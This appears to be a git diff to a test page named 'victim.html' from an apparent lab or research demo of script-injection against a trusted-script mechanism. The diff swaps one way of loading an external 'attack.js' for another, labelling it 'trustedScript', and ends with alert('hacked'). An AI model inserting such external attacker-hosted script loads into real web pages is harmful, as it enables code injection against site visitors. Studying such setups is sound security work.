--- a/victim.html
+++ b/victim.html
@@ -4,10 +4,11 @@
 
 <script id="trustedScript" text="type/javascript" src="core-flashjax-irm.js"></script>
 
-<!--script id="trustedScript" text="type/javascript" src="http://tmasthay1.github.io/attack.js"></script-->
+<script id="trustedScript" text="type/javascript" src="https://raw.githubusercontent.com/tmasthay1/tmasthay1.github.io/master/attack.js"></script>
 
 <script text="type/javascript">
-loadExternalJS("third-party","https://raw.githubusercontent.com/tmasthay1/tmasthay1.github.io/master/attack.js")
+//loadExternalJS("third-party","https://raw.githubusercontent.com/tmasthay1/tmasthay1.github.io/master/attack.js")
+ 
 trustedFunction();	
 alert("hacked");
 </script>
